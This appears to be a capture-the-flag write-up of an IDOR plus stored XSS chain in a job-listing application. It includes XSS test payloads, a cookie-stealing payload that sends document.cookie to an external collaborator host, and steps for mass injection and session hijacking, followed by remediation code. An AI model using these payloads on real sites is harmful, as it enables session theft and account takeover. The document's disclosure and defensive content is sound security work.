Hi! In my spare time, I've been participating in the Helium Challenge Batch 2 event organized by Cyber Academy, and in this article I'd like to share one of the insights I gained while taking part in the event :)
Summary
A critical vulnerability chain was identified in the application combining Insecure Direct Object Reference (IDOR) and Stored Cross-Site Scripting (XSS), which can be exploited to achieve mass account takeover.
The /api/jobs/{id} endpoint does not enforce proper authorization checks, allowing attackers to modify job postings belonging to other users by manipulating the job identifier. Additionally, multiple input fields are vulnerable to Stored XSS, enabling attackers to inject malicious JavaScript that is executed in victims' browsers.
By chaining these vulnerabilities, an attacker can inject persistent XSS payloads into arbitrary job postings, resulting in large-scale session hijacking.
Affected Application
Vulnerability Details
Insecure Direct Object Reference (IDOR)
The application fails to validate whether the authenticated user is authorized to modify a specific job resource.
Vulnerable Endpoint:
PUT /api/jobs/{id}

An attacker can modify any job posting by changing the {id} parameter, leading to unauthorized access and modification of other users' data.
Stored Cross-Site Scripting (XSS)
The following fields are vulnerable to persistent XSS:
- title
- description
- requirements

User input is not properly sanitized or encoded before being stored and rendered, allowing malicious JavaScript execution.
Vulnerability Chaining
By combining IDOR and Stored XSS:
1. Attacker enumerates job IDs
2. Modifies other users' job postings via IDOR
3. Injects persistent XSS payloads
4. Victims view the job details page
5. Malicious JavaScript executes in victims' browsers
6. Session cookies are exfiltrated and accounts are taken over
Attack Scenario
An attacker can:
1. Enumerate job IDs via available API endpoints
2. Use IDOR to overwrite job postings owned by other users
3. Inject a malicious XSS payload into multiple job entries
4. Wait for victims to view the job listings
5. When victims access the manipulated job details page, their session cookies are automatically exfiltrated, allowing the attacker to hijack their accounts.
Steps to Reproduce
For this test, I used both of my accounts with different roles: "Job Seeker" and "Company."


The Job Listings page shows that 26 job openings have been found.

The tester then used the Company account to create a post related to a job opening.

After that, the tester edited the post created earlier. Before clicking "Post Job," the tester enabled the intercept feature in the Helium Core tool.


Here is the request generated when editing the job post. As shown, the edit is sent to a single endpoint:
PUT /api/jobs/39
where 39 is the ID of the tester's own post.

Then, during the reconnaissance phase, the tester discovered that another user's post could be viewed by its ID through the following endpoint:
GET /api/jobs/11
Next, the tester changed the job ID in the PUT request from their own post to the other user's post:
PUT /api/jobs/39 > PUT /api/jobs/11
The response shows that the tester was able to modify the other user's job post.

Next, the tester found that all three parameters in the update request are vulnerable to XSS:
- title
- description
- requirements

XSS payloads:
<img src=x onx=() onerror=alert('title')>
<img src=x onx=() onerror=alert('description')>
<img src=x onx=() onerror=alert('requirements')>
As a result, when the tester opens their own job posting page, the XSS payload is executed; the same happens for any other user who views the tester's post.



Job Seeker account

To exploit this vulnerability, the tester used an XSS payload that steals the victim's cookies.
Cookie-stealing XSS payload:
<img src=x onerror=this.src='http://XXXXXX.oastify.com/?c='+document.cookie>

To carry out this attack, the tester used the BurpSuite "Intruder" feature, which allows the modified request to be sent against all of the other users' job posts in one run.

Using the BurpSuite Collaborator feature, the tester observed that one user was affected by the attack, and the tester obtained that victim's cookie.

The tester then replaced their own cookies with the victim's by editing the cookies in the browser Developer Tools.


The tester could then edit the victim's profile.

Impact
This vulnerability chain significantly increases risk due to the combination of access control bypass and persistent client-side code execution.
Unauthorized Access (IDOR)
- Modify job postings of other users
- Authorization bypass
Stored XSS (Persistent)
- Payload executed on every view
- Affects multiple users
Mass Account Takeover
- Session hijacking via cookie exfiltration
- Scalable attack affecting many users
Recommendations
IDOR (Authorization Check)
Ensure users can only access their own resources:
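As an added example (not the challenge application's code), here is that ownership check written out as a runnable handler for PUT /api/jobs/{id}. The job IDs 11 and 39 come from the steps above; the user IDs, the in-memory job store and the status-code mapping are assumptions. It also rejects fields outside the editable set, since an update endpoint that accepted owner_id would reopen the same problem through a different door.

```python
# Added example (not the challenge application's code): the ownership check
# the writeup recommends for PUT /api/jobs/{id}, written framework-free so it
# runs stand-alone. Job IDs 11 and 39 follow the writeup; the user IDs, the
# in-memory store and the status-code mapping are assumptions.
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass
class Job:
    id: int
    owner_id: int
    title: str
    description: str = ""
    requirements: str = ""


# Constructed store: job 11 belongs to another company (user 100),
# job 39 belongs to the tester's Company account (user 200).
JOBS: Dict[int, Job] = {
    11: Job(id=11, owner_id=100, title="Backend Engineer"),
    39: Job(id=39, owner_id=200, title="Tester's posting"),
}

# Only these fields may be changed through the endpoint. Rejecting anything
# else blocks mass assignment of owner_id, which would be a second way to
# take over a posting.
EDITABLE = {"title", "description", "requirements"}


def update_job(current_user_id: int, job_id: int, changes: dict,
               jobs: Dict[int, Job] = JOBS) -> Tuple[int, dict]:
    """Handle PUT /api/jobs/{job_id} for an authenticated user.

    Returns (http_status, body). The IDOR in the writeup exists because the
    handler trusted the {id} in the URL; here the job's owner_id is compared
    to the authenticated user's id on every request, before any write.
    """
    job = jobs.get(job_id)
    if job is None:
        return 404, {"error": "job not found"}
    if job.owner_id != current_user_id:
        # The authorization check that was missing: the caller may only
        # modify jobs they own, whatever id they put in the URL.
        return 403, {"error": "forbidden"}
    unknown = set(changes) - EDITABLE
    if unknown:
        return 400, {"error": "unknown fields", "fields": sorted(unknown)}
    for field, value in changes.items():
        setattr(job, field, str(value))
    return 200, {"id": job.id, "title": job.title}


if __name__ == "__main__":
    # The writeup's scenario: user 200 tries to rewrite job 11 via the URL id.
    print(update_job(200, 11, {"title": "hijacked"}))   # (403, {'error': 'forbidden'})
    print(update_job(200, 39, {"title": "updated"}))    # (200, {'id': 39, 'title': 'updated'})
```

Returning 403 follows the recommendation above; some teams return 404 for both missing and foreign jobs so the response does not confirm which IDs exist, which also blunts the enumeration step in the attack scenario. Either way the check belongs in the handler for every write path, not only the one the tester happened to find.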
if job.owner_id != current_user.id:
    return 403 Forbidden  # reject updates to jobs the caller does not own

Input Validation & Output Encoding
- Sanitize all user input
- Escape dangerous characters: < > " ' & /
- Apply proper output encoding when rendering
Use Sanitization Libraries
- Frontend: DOMPurify
- Backend: OWASP Java HTML Sanitizer
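Added example, not code from the application or from the libraries named above: a vulnerable render that interpolates the three fields verbatim, next to one that entity-encodes them at output time, using the writeup's own test payloads as constructed input. The HTML template and the element-name check are assumptions.

```python
# Added example (not the challenge application's code): output encoding for the
# three job fields the writeup names. Contrasts a vulnerable render that
# interpolates raw input with one that encodes every untrusted value at output
# time using only the standard library. The HTML template is an assumption;
# the job values reuse the test payloads shown in the writeup.
import html
import re

FIELDS = ("title", "description", "requirements")

# Constructed job record carrying the writeup's three test payloads.
MALICIOUS_JOB = {
    "title": "<img src=x onx=() onerror=alert('title')>",
    "description": "<img src=x onx=() onerror=alert('description')>",
    "requirements": "<img src=x onx=() onerror=alert('requirements')>",
}

# Assumed job-details template: the title lands both in an attribute and in a
# text node, the two contexts html.escape(quote=True) covers.
TEMPLATE = (
    '<article data-title="{title}">\n'
    "  <h1>{title}</h1>\n"
    "  <p>{description}</p>\n"
    "  <p>{requirements}</p>\n"
    "</article>"
)


def render_job_unsafe(job: dict) -> str:
    """Vulnerable pattern: untrusted fields are placed into the page verbatim."""
    return TEMPLATE.format(**{f: str(job.get(f, "")) for f in FIELDS})


def encode_for_html(value: str) -> str:
    """Entity-encode < > & " ' so the value is inert in text nodes and inside
    double- or single-quoted attribute values."""
    return html.escape(value, quote=True)


def render_job_safe(job: dict) -> str:
    """Hardened pattern: every untrusted field is encoded at render time.
    Encoding at output (not at storage) keeps the stored data intact and
    covers records that were written before the fix."""
    return TEMPLATE.format(**{f: encode_for_html(str(job.get(f, ""))) for f in FIELDS})


TAG_RE = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)")
TEMPLATE_ELEMENTS = {"article", "h1", "p"}


def element_names(fragment: str) -> set:
    """Names of the start tags a parser would see in the fragment."""
    return {m.group(1).lower() for m in TAG_RE.finditer(fragment)}


def injected_elements(fragment: str) -> set:
    """Elements in the rendered fragment that the template did not put there;
    an empty set means no user-supplied markup survived rendering."""
    return element_names(fragment) - TEMPLATE_ELEMENTS


if __name__ == "__main__":
    print("unsafe render introduces:", injected_elements(render_job_unsafe(MALICIOUS_JOB)))  # {'img'}
    print("safe render introduces:", injected_elements(render_job_safe(MALICIOUS_JOB)))      # set()
```

Encoding at render time rather than at storage means records poisoned before the fix are neutralised too, and the stored text is preserved for legitimate use (a requirement such as "C++ < 5 years" survives intact). DOMPurify or the OWASP sanitizer are the right tool where some HTML must be allowed in a field; for plain-text fields like these three, encoding is simpler and has no allow-list to get wrong.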
Implement Content Security Policy (CSP)
Content-Security-Policy: default-src 'self'; script-src 'self';
Secure Session Cookies
- Set HttpOnly flag
- Set Secure flag
- Use SameSite attribute
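Added example (not the application's code) that builds the CSP and session-cookie settings recommended in the two sections above and audits the weak form of each; the cookie name "session", its value and the SameSite=Lax choice are assumptions.

```python
# Added example (not the challenge application's code): building the
# Content-Security-Policy and session-cookie settings the writeup recommends,
# plus small checks that flag the weak form of each. The cookie name "session",
# its value and SameSite=Lax are assumptions.
from http.cookies import SimpleCookie
from typing import Dict, List, Set

# Policy from the writeup: no inline scripts, no third-party script hosts.
# With script-src 'self', an inline event handler such as the writeup's
# onerror= payload is refused by the browser even if it reaches the page.
CSP = "default-src 'self'; script-src 'self';"

REQUIRED_COOKIE_FLAGS = ("HttpOnly", "Secure", "SameSite")


def session_cookie_header(name: str, value: str, max_age: int = 3600) -> str:
    """Serialize a session cookie with the three attributes the writeup lists.
    HttpOnly keeps document.cookie from exposing it to script, Secure limits it
    to HTTPS, SameSite=Lax keeps it off most cross-site requests."""
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    morsel["path"] = "/"
    morsel["max-age"] = max_age
    return morsel.OutputString()


def missing_cookie_flags(set_cookie: str) -> Set[str]:
    """Return which of HttpOnly / Secure / SameSite a Set-Cookie header lacks."""
    attributes = {part.strip().split("=", 1)[0].lower()
                  for part in set_cookie.split(";")[1:]}
    return {flag for flag in REQUIRED_COOKIE_FLAGS if flag.lower() not in attributes}


def csp_directives(policy: str) -> Dict[str, List[str]]:
    """Parse 'name src src; name src' into a directive map."""
    result: Dict[str, List[str]] = {}
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens:
            result[tokens[0].lower()] = tokens[1:]
    return result


def csp_blocks_inline_scripts(policy: str) -> bool:
    """True when the policy forbids inline script and inline event handlers.
    script-src falls back to default-src; with neither present, CSP places
    no restriction on scripts at all."""
    directives = csp_directives(policy)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False
    return "'unsafe-inline'" not in sources and "*" not in sources


def hardened_headers() -> Dict[str, str]:
    """Response headers a job-details page should send under the writeup's advice."""
    return {
        "Content-Security-Policy": CSP,
        "Set-Cookie": session_cookie_header("session", "constructed-session-value"),
    }


if __name__ == "__main__":
    print(missing_cookie_flags("session=abc; Path=/"))   # weak cookie: all three flags missing
    print(hardened_headers())
```

The CSP matters for this particular chain because the cookie-stealing payload runs from an inline onerror= handler; script-src 'self' without 'unsafe-inline' makes the browser refuse it even where the encoding fix was missed. HttpOnly stops document.cookie exfiltration but not script acting on the victim's behalf from inside the page, so the cookie flags complement the CSP and output encoding rather than replace them.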
References
Lesson learned
A critical vulnerability chain combining IDOR and Stored XSS was identified, allowing attackers to modify other users' job postings and inject persistent malicious scripts.
This enables large-scale exploitation where victims unknowingly execute attacker-controlled JavaScript upon viewing job details. As a result, session cookies can be exfiltrated, leading to mass account takeover.
The issue is easily exploitable and affects multiple users, significantly increasing overall risk to the platform.